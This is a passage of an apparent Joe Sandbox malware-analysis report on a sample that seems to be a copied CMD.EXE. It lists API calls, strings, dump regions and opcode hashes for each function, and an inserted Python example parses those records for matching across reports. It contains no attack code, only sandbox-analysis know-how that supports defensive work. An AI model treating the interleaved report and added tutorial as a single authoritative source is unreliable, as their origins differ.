• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482D7
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482FB
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944831A
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448364
• RtlFreeHeap.NTDLL ref: 00007FF6E9448378
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944839A
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483AE
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483E6
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448403
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448418
Strings
Similarity
• API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
• String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
• API String ID: 3637805771-3100821235
APIs
Strings
Similarity
• API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
• String ID: DPATH
• API String ID: 95024817-2010427443
APIs
Strings
Similarity
• API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
• String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
• API String ID: 1795611712-3662956551
APIs
• _wcsupr.MSVCRT ref: 00007FF6E944EF33
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EF98
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFA9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFBF
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E944EFDC
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFED
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F003
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F022
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F083
                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F092
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F0A5
                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF6E944F0DB
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F135
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F16C
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F185
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
• String ID: <noalias>$CMD.EXE
• API String ID: 1161012917-1690691951
• Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction ID: 0a4195b632bf2243f85b50ace29cecfcafb1a5084cfe2153f0882de2ec3b86ec
• Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction Fuzzy Hash: EE919123F08652CAFB159F60E8102BD6AA0AF49B59F448135DD0E827D5DF3EA84EC716
Similarity
• API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
• String ID: \\?\
• API String ID: 628682198-4282027825
• Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
• Instruction ID: 8b23b2eca7631305e547478c69c4c8f33402ff62c3f9f3d7d4656906ec964833
• Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
• Instruction Fuzzy Hash: 85E18C63A08682D6EB649F64D8943F963A0FF89749F404139DA0EC77D4EE3EE649C305
Similarity
• API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
• String ID: COPYCMD$\
• API String ID: 3989487059-1802776761
• Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
• Instruction ID: b19c15e80af4c31c34c67f2e6d59da32a5621f205c47d1eac8ce32fe79076bd4
• Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
• Instruction Fuzzy Hash: 31F1C067A08786C2EB249F2594043BA67B0FF59B88F048135DE4EC7795EE3EE049C706
Similarity
• API ID: Time$File$System$FormatInfoLocalLocale
• String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
• API String ID: 55602301-2548490036
• Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
• Instruction ID: ff955b42c9620b9a1095b925c3c17963fba24564c9da0eb7068c19b3b3e7b10c
• Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
• Instruction Fuzzy Hash: E6A1AE33A19642D6EB20CF70E4483BA67A1FF94754F904136EA4E87694EF3DE548C70A
Similarity
• API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
• String ID:
• API String ID: 3935429995-0
• Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
• Instruction ID: 38be0df2807263b075c5f66a05abc3329269bacd6d4fc801395c7ccb26dabb62
• Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
• Instruction Fuzzy Hash: 8261DE67A18792C2E714DFA6A404679BBA1FF89F54F058134EE4A837A0EF3ED409C705
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                        • Instruction ID: 5de523657d9d39235c7ccb5d27c298c0ac1b0d665695a56d3b5033985c4b3d11
                                                                                                                                                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                        • Instruction Fuzzy Hash: 94515CB3A18642CAE700CF61A8406A83BB4FF44754F404635DA6DD77A5DF7EA548CB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction ID: f184d66e61f572ce9ea4a638f1b849d773b83185327a965e805fffd4258319ee
                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E717763E0C686C5FB64AF64A84837A22E0BF11754F544539D90EC76E1EF3EA48DC34A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                        • Instruction ID: c7aeab089b9f7628b17573abfa337ace0854aa88f9e5d843b40646b6c30570bb
                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 10D14563A08647C6FB10AF71A8493B927A1BF44B44F448035DA4EC63A5EE3EE44DC71A
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94232F3
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6E94232A4), ref: 00007FF6E9423309
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E9423384
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94411DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 611521582-0
                                                                                                                                                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                        • Instruction ID: 85076ccb8cd57b1e8a4b0520062ee9e0d36cde55ca5ff42f6ec19b776ebd70f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                        • Instruction Fuzzy Hash: C6A19C63B08612CAEB188F61A8543BD66A1FF4DB49F445135DE0EC7784DF3EA449C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile_open_osfhandle
                                                                                                                                                                        • String ID: con
                                                                                                                                                                        • API String ID: 2905481843-4257191772
                                                                                                                                                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                        • Instruction ID: 77a4eea96e4cd48e4847b908c555b6a38946d185274eecfbb37fe0f7dbe8e67a
                                                                                                                                                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D716C73A08681CAE760CF34A444379BAA0FF8AB61F544234DE5A82794DF3ED44DCB05
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                        • API String ID: 3510147486-2605508654
                                                                                                                                                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction ID: 5bcb3aaa87656f2fc5fdf34ada2e853312160800a6410138107d0a702ec0e852
                                                                                                                                                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction Fuzzy Hash: AF614773608B82CAEB668F61D8543E977A5FF49B89F444139DA0D8B758DF3AD208C704
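The function records above (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are easier to triage once they are turned into structured data: which dump region each function was recovered from, which Win32 imports it reaches, and which Opcode/Instruction IDs can be matched against other reports. The parser below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling. Its sample input is a constructed, abridged copy of two records from this section (argument lists and most Associated lines shortened). One assumption is flagged in the code: the reading of the dotted `.sdmp` name fields (process index, region base, page protection) is inferred from the values on this page, not taken from Joe Sandbox documentation.

```python
"""Parse Joe Sandbox function-level records (APIs / Strings / Memory Dump
Source / Joe Sandbox IDA Plugin / Similarity blocks) into dictionaries so
they can be filtered, indexed and compared across reports."""
import re

# Constructed sample: two records abridged from the report text (process 6,
# image base 00007FF6E9420000). Argument lists and Associated lines are cut.
SAMPLE = """\
APIs
  • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
  • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8), ref: 00007FF6E943359C
• _get_osfhandle.MSVCRT ref: 00007FF6E94232F3
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,0000002F,00007FF6E94232A4), ref: 00007FF6E9423309
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E9423384
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94411DF
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
• String ID:
• API String ID: 611521582-0
• Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction ID: 85076ccb8cd57b1e8a4b0520062ee9e0d36cde55ca5ff42f6ec19b776ebd70f4
• Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction Fuzzy Hash: C6A19C63B08612CAEB188F61A8543BD66A1FF4DB49F445135DE0EC7784DF3EA449C70A
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CreateFile_open_osfhandle
• String ID: con
• API String ID: 2905481843-4257191772
• Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
• Instruction ID: 77a4eea96e4cd48e4847b908c555b6a38946d185274eecfbb37fe0f7dbe8e67a
• Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
• Instruction Fuzzy Hash: 1D716C73A08681CAE760CF34A444379BAA0FF8AB61F544234DE5A82794DF3ED44DCB05
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = "•"

# "<name>.<module>(<args>), ref: <addr>", optionally prefixed with the
# "Part of subcall function <addr>: " marker used for calls made by callees.
API_CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[^.]+)\.(?P<module>[^( ]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)$")

# Win32 page-protection constants (MEMORY_BASIC_INFORMATION.Protect values).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_records(text):
    """Return one dict per function record; a record starts at each 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                rec = {"apis": [], "associated": []}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith(BULLET):
            continue
        body = line[len(BULLET):].strip()
        if section == "APIs":
            m = API_CALL_RE.match(body)
            if m:
                rec["apis"].append(m.groupdict())
        elif section == "Memory Dump Source":
            if body.startswith("Associated: "):
                rec["associated"].append(body[len("Associated: "):])
            else:
                m = SOURCE_RE.match(body)
                if m:
                    rec.update(source=m["file"], image_base=int(m["offset"], 16),
                               based_on_pe=(m["pe"] == "true"))
        else:  # Joe Sandbox IDA Plugin / Similarity: plain "key: value" bullets
            key, _, value = body.partition(":")
            rec[key.strip()] = value.strip()
    return records


def describe_dump(name):
    """Split an .sdmp name into fields. ASSUMPTION (inferred from the values on
    this page, not from Joe Sandbox documentation): field 0 is the process
    index, field 3 the region base address, field 4 the Win32 page protection."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    protect = int(fields[4], 16)
    return {"process": int(fields[0], 16), "base": int(fields[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect))}


def api_names(records):
    """Sorted, de-duplicated list of every API reached from the parsed functions."""
    return sorted({call["name"] for rec in records for call in rec["apis"]})


def index_by(records, key):
    """Group records by a Similarity field (e.g. 'Opcode ID') for cross-report matching."""
    index = {}
    for rec in records:
        index.setdefault(rec.get(key, ""), []).append(rec)
    return index


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        src = describe_dump(rec["source"])
        print(f"{rec['Opcode ID'][:16]}  base={src['base']:#x} {src['protect']}  "
              f"apis={[c['name'] for c in rec['apis']]}  string={rec['String ID']!r}")
    print("imports:", api_names(recs))
```

Indexing on `Opcode ID` or `Instruction Fuzzy Hash` is the useful part when several reports of the same family are on hand: identical Opcode IDs across samples identify shared code regardless of where it was loaded, and the dump-name protection field separates the executable section (the `00000020` region at image base + 0x1000 here) from the read-only and read/write regions that only hold headers and data.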
APIs
• longjmp.MSVCRT(?,00000000,00000000,00007FF6E9427279,?,?,?,?,?,00007FF6E942BFA9), ref: 00007FF6E9444485
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
